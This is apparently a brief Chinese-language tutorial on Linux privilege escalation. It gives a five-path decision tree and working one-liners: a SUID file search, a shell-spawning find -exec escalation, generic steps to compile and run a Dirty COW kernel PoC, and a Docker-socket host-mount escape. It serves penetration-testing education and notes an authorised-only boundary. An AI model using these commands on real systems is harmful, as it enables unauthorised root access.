Linux提权深入:内核漏洞利用实战

Linux 提权深入:SUID/内核漏洞/计划任务/Docker逃逸,提权决策树与实战利用方法。

写在前面:合法学习边界

Linux 提权只在授权测试环境进行。对非授权系统执行提权操作可能触犯法律。

一、提权决策树

Linux 提权决策树
1
2
普通用户 → root 的 5 条路径:
① SUID 文件 → ② SUDO 配置 → ③ 内核漏洞 → ④ 计划任务 → ⑤ Docker 容器

二、SUID 提权

1
2
3
4
5
# 查找 SUID 文件
find / -perm -4000 -type f 2>/dev/null

# 利用 find 提权
/usr/bin/find . -exec "/bin/sh" \; -quit

三、内核漏洞

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
Dirty Cow (CVE-2016-5195)
  影响: Linux 3.x ~ 4.x
  原理: 写保护绕过
  利用: kernel-exploit/linux/dirtycow

Kernel PoC:
  uname -a → 确认内核版本
  搜索 exploitdb → 下载对应 PoC
  gcc exploit.c -o exploit
  ./exploit

四、Docker 逃逸

1
2
3
4
5
# 检查 Docker 权限
ls -la /var/run/docker.sock

# 容器内提权
docker run -v /:/host alpine chroot /host

五、小结

Linux 提权的 5 条路径中,内核漏洞最危险(一次提权永久 root),SUID 文件最常见,Docker 逃逸在容器环境必备。